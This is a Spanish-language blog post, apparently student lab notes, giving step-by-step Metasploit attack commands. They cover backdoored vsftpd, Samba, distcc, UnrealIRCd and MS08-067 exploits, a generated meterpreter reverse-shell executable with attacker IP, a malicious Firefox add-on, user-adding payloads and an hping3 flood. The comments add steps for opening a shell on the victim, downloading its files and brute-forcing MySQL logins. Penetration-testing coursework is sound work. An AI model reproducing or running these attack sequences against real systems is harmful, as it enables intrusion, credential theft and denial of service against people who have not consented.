viernes, 28 de marzo de 2014

Pruebas de ataques 1

Ataque WEP
Herramienta: minidwep
Para obtener SSID oculto, se bede tipear en el terminal: besside-ng -b MAC mon0
Bsucar puertos: nmap -sS -sV rango ip, o ip especifica (192.168.10.0/24, 192.168.10.0-224)  
Ataque Linux
  • Samba – Netbios: 
  • search samba 
  • use exploit/multi/samba/usermap_script 
  • set payload cmd/unix/reverse 
  •  Otro: search osvdb:73573 
  • use exploit/unix/ftp/vsftpd_234_backdoor 
  • set payload amd/unix/intercat 
  • search distcc 
  • use exploit/unix/misc/distcc_exec 
  • search irc o unreal 
  • use exploit/unix/irc/unreal_irc_3281_backdoor  
Ataque windows
  • XP 
  • search ms08-067 
  • use expoit/windows/smb/·..... 
  • set payload windows/meterpreter/reverse_tcp, (windows/shell/reverse_tcp) 
  • show options 
  • set LHOST ip atacante 
  •  set RHOST victima exploit 
  •  VNC: set payload windows/vncinject/reverse_tcp exploit 
  •  set payload windows/adduser 
  • set USER nombre usuario 
  •  set PASS pasword 
  • WINDOWS 7 
    • msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 x > /root/Desktop/exploit.exe -> se crea en el escritorio copiar esto a windows 
    • use exploit/multi/handler 
    • set payload windows/meterpreter/reverse_tcp 
    • show options 
    • set LHOST 192.168.1.2 
    • exploit 
    •  OTRO:
    • use exploit /multi/browser/firefox_xpi_bootstrap_addon 
    • set PAYLOAD windows/meterpreter/reverse_tcp 
    • set SRVHOST (maquina del atacante) 
    • set URIPATH / exploit show options
  • hping3 -p80 -s --flood ip_victima

7 comentarios:

  1. Mijin estas ahi confirma... con un coment

    ResponderEliminar
  2. pon esto

    set payload windows/meterpreter/reverse_tcp, (windows/shell/reverse_tcp)
    set LHOST tu_ip
    set RHOST 192.168.1.113

    ResponderEliminar
  3. meterpreter> shell --> te abre una terminal de windows
    de ahi buscas el archivo en el escritorio, esta bajo Documents and Settings ahi buscas el user y esta en scritorio

    ResponderEliminar
  4. para bajar el archivo sales del shell--> CTRL+C

    y de ahi pones download path_de_windows_del_archivo
    el archivo se baja en /root

    ResponderEliminar
  5. de ahi sales de ese exploit -->exit para salir del meterpreter--> back para volver al msf>

    Aqui das esto: use auxiliary/scanner/mysql/mysql_login
    De ahi set RHOSTS 192.168.1.183
    Despues le das show options y ves las opciones y das
    set USERNAME ruta del archivo que te bajaste de windows
    PASS_FILE ruta del archivo que te bajaste de windows, fíjate algo parecido no recordamos, algo como file y user en el show options ves

    ResponderEliminar
  6. ejecutas el exploit y te sale 2 succesfull, pero ahi ya le muestras al profe

    ResponderEliminar